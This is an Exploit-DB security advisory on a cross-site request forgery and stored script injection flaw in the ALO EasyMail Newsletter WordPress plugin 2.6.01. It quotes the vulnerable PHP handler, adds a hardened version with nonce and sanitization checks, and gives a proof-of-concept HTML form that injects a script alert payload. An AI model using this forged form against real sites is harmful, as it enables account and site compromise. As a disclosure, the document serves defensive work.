WordPress Plugin ALO EasyMail NewsLetter 2.6.01 – Cross-Site Request Forgery

  • Author: Mohsen Lotfi
    Date: 2016-02-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39451/
    # Exploit Title: WordPress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability
    # Software Link: https://wordpress.org/plugins/alo-easymail/
    # Affected Version: 2.6.01
    # Exploit Author: Mohsen Lotfi
    # Contact: mohsen.lotfi.all@gmail.com
    # Twitter: fox_one_fox_one
    # Date: 01-16-2016
    
    #####################
    1. Description
    #####################
    
    The plugin contains a CSRF vulnerability: the "save_list" handler accepts a forged POST request without any nonce check and stores the submitted list name as-is, so the flaw can be exploited to perform a script insertion attack.
    
    The script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php:
    
    case "save_list":	// SAVE a mailing list (add or update)
    			if ( isset($_REQUEST['submit_list']) ) {
    				//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) );
    				
    				// List name	
    				$list_name	= array();
    				foreach ( $languages as $key => $lang ) {
    					if (isset($_POST['listname_'.$lang]) )	$list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang]));/* script insertion here */
    				}
    				
    				$list_available = stripslashes( trim( $_POST['elp_list_available'] ) );
    				$list_order = stripslashes( trim( $_POST['elp_list_order'] ) );
    				if ( $list_name && $list_available && is_numeric($list_order) ) {
    					$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' );
    					if ( $list_id ){ // update
    						$mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order );
    					} else { // or add a new
    						if ( empty($mailinglists) ) { // if 1st list, skip index 0
    							$mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => "");
    						}	
    						$mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order);
    					}
    					if ( alo_em_save_mailinglists ( $mailinglists ) ) {
    						unset ( $list_id );
    						unset ( $list_name );
    						unset ( $list_available );						
    						unset ( $list_order );	
    						echo '<div id="message" class="updated fade"><p>'. __("Updated", "alo-easymail") .'</p></div>';
    					} else {
    						echo '<div id="message" class="error"><p>'. __("Error during operation.", "alo-easymail") .'</p></div>';
    					}
    				} else {
    					echo '<div id="message" class="error"><p>'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'</p></div>';
    				}
    			}	
    			break;
    
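For comparison, here is a hardened counterpart of that branch. This is an added example and not the plugin's code or its 2.7.0 fix; the nonce action name "alo_easymail_save_list", the capability "manage_options" and the allow-list of visibility values are assumptions.

```php
<?php
// Added example, not the plugin's code or its 2.7.0 fix. Assumed names:
// the nonce action "alo_easymail_save_list" and the capability "manage_options".

// Call this inside the list form so the submit carries a user-bound nonce;
// a cross-site form cannot know this value in advance.
function hardened_list_form_fields() {
    wp_nonce_field( 'alo_easymail_save_list', '_wpnonce' );
}

// Hardened counterpart of the "save_list" branch. Three checks are added:
// capability, nonce, and sanitization of the stored list name.
function hardened_save_list( array $languages ) {
    if ( ! isset( $_REQUEST['submit_list'] ) ) {
        return false;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( __( 'You are not allowed to do this.', 'alo-easymail' ) );
    }
    // Dies with an error page when the nonce is missing or invalid.
    check_admin_referer( 'alo_easymail_save_list', '_wpnonce' );

    $list_name = array();
    foreach ( $languages as $lang ) {
        if ( isset( $_POST[ 'listname_' . $lang ] ) ) {
            // sanitize_text_field() strips tags; <script> never reaches the DB.
            $list_name[ $lang ] = sanitize_text_field( wp_unslash( $_POST[ 'listname_' . $lang ] ) );
        }
    }
    $list_available = isset( $_POST['elp_list_available'] ) ? sanitize_key( $_POST['elp_list_available'] ) : '';
    $list_order     = isset( $_POST['elp_list_order'] ) && is_numeric( $_POST['elp_list_order'] ) ? (int) $_POST['elp_list_order'] : null;
    // Allow-list the visibility value (assumed: the three kinds the plugin loads below).
    if ( empty( $list_name ) || ! in_array( $list_available, array( 'hidden', 'admin', 'public' ), true ) || null === $list_order ) {
        return false;
    }

    $list_id      = isset( $_POST['list_id'] ) ? absint( $_POST['list_id'] ) : 0;
    $mailinglists = alo_em_get_mailinglists( 'hidden,admin,public' );
    $entry        = array( 'name' => $list_name, 'available' => $list_available, 'order' => $list_order );
    if ( $list_id ) {
        $mailinglists[ $list_id ] = $entry;
    } else {
        if ( empty( $mailinglists ) ) { // first list: keep index 0 unused, as the plugin does
            $mailinglists[] = array( 'name' => 'not-used', 'available' => 'deleted', 'order' => '' );
        }
        $mailinglists[] = $entry;
    }
    // Still escape on output (esc_html) wherever the name is echoed.
    return (bool) alo_em_save_mailinglists( $mailinglists );
}
```

With the nonce in place, the PoC form below fails at check_admin_referer() before any of the submitted values are read.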
    
    #####################
    2. Proof of Concept
    #####################
     
    Log in as a regular user, then:
     
    <form method="post" action="http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php">
    <input type="hidden" name="listname_en" value="<script>alert('xss')</script>">
    <input type="hidden" name="elp_list_available" value="hidden">
    <input type="hidden" name="elp_list_order" value="0">
    <input type="hidden" name="user_ID" value="1">
    <input type="hidden" name="task" value="save_list">
    <input type="hidden" name="list_id" value="">
    <input type="submit" name="submit_list" value="Trigger!">
    </form>
    
    
    #####################
    3. Solution
    #####################
     
    Update to version 2.7.0
    https://wordpress.org/plugins/alo-easymail/changelog/
    
    #####################
    4. Report Timeline
    #####################
    
    01-16-2016 : Vulnerability discovered.
    01-25-2016 : Vendor notified of vulnerability.
    02-07-2016 : Vendor replied and released fixed version.